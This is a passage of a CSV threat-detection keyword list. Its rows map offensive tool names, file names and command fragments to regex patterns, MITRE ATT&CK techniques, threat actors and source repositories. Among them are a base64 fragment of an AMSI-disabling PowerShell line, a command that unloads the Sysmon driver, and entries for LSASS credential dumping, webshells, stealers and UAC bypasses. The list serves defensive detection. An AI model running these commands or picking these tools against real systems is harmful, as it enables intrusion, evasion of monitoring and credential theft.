COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*fishing_with_hollowing*",".{0,1000}fishing_with_hollowing.{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","122","14","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" "*FJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==*",".{0,1000}FJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw\=\=.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*fkasler/cuddlephish*",".{0,1000}fkasler\/cuddlephish.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*Flangvik/NetLoader*",".{0,1000}Flangvik\/NetLoader.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*Flangvik/SharpCollection*",".{0,1000}Flangvik\/SharpCollection.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Flangvik/SharpExfiltrate*",".{0,1000}Flangvik\/SharpExfiltrate.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*Flangvik/TeamFiltration*",".{0,1000}Flangvik\/TeamFiltration.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*flashupdate.ps1*",".{0,1000}flashupdate\.ps1.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*flipt-io/reverst*",".{0,1000}flipt\-io\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*floesen/EventLogCrasher*",".{0,1000}floesen\/EventLogCrasher.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*floesen/KExecDD*",".{0,1000}floesen\/KExecDD.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","1","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*florylsk/NtRemoteLoad*",".{0,1000}florylsk\/NtRemoteLoad.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*fltMC* unload SysmonDrv*",".{0,1000}fltMC.{0,1000}\sunload\sSysmonDrv.{0,1000}","offensive_tool_keyword","fltMC","Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. network monitoring will still be effective)","T1562.006 - T1562.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1","1","0","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*FluxionNetwork*",".{0,1000}FluxionNetwork.{0,1000}","offensive_tool_keyword","FluxionNetwork","Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Its compatible with the latest release of Kali (rolling). Fluxions attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues","T1559 - T1189 - T1059 - T1566 - T1056","TA0001 - TA0002 - TA0009","N/A","N/A","Phishing","https://github.com/FluxionNetwork/fluxion","1","1","N/A","N/A","10","4697","1380","2023-11-03T23:16:30Z","2017-04-29T10:22:27Z" "*fnjhmkhhmkbjkkabndcnnogagogbneec*",".{0,1000}fnjhmkhhmkbjkkabndcnnogagogbneec.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*fnnegphlobjdpkhecapkijjdkgcjhkib*",".{0,1000}fnnegphlobjdpkhecapkijjdkgcjhkib.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*fodhelperbypass*",".{0,1000}fodhelperbypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fodhelperUACBypass*",".{0,1000}fodhelperUACBypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Follina.Ninja*",".{0,1000}Follina\.Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*follina.py*muban.docx*",".{0,1000}follina\.py.{0,1000}muban\.docx.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","392","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*Follina/follina.html*",".{0,1000}Follina\/follina\.html.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Follina/Follinadoc*",".{0,1000}Follina\/Follinadoc.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*for /f %%i in (C:\Windows\IME\ok.txt)*",".{0,1000}for\s\/f\s\%\%i\sin\s\(C\:\\Windows\\IME\\ok\.txt\).{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*for /r c:\windows\system32\ %i in (*sht*.exe)*",".{0,1000}for\s\/r\sc\:\\windows\\system32\\\s\%i\sin\s\(.{0,1000}sht.{0,1000}\.exe\).{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*For fun and (no) profit : lets hook rtlcomparememory in lsass.exe*",".{0,1000}For\sfun\sand\s\(no\)\sprofit\s\:\slets\shook\srtlcomparememory\sin\slsass\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*-force-forwardableet-ADComputer*",".{0,1000}\-force\-forwardableet\-ADComputer.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*foreign_access.cna*",".{0,1000}foreign_access\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass * *",".{0,1000}foreign_lsass\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","0","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.c*",".{0,1000}foreign_lsass\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.x64*",".{0,1000}foreign_lsass\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.x86*",".{0,1000}foreign_lsass\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*forge_ticket.rb*",".{0,1000}forge_ticket\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*forge_ticket_spec.rb*",".{0,1000}forge_ticket_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ForgeCert.exe*",".{0,1000}ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ForgeCert-main*",".{0,1000}ForgeCert\-main.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*Forging a token from a fake Network Authentication through Datagram Contexts*",".{0,1000}Forging\sa\stoken\sfrom\sa\sfake\sNetwork\sAuthentication\sthrough\sDatagram\sContexts.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*forkatz.exe*",".{0,1000}forkatz\.exe.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*forkatz.sln*",".{0,1000}forkatz\.sln.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*forkatz.vcxproj*",".{0,1000}forkatz\.vcxproj.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*forkatz-main*",".{0,1000}forkatz\-main.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 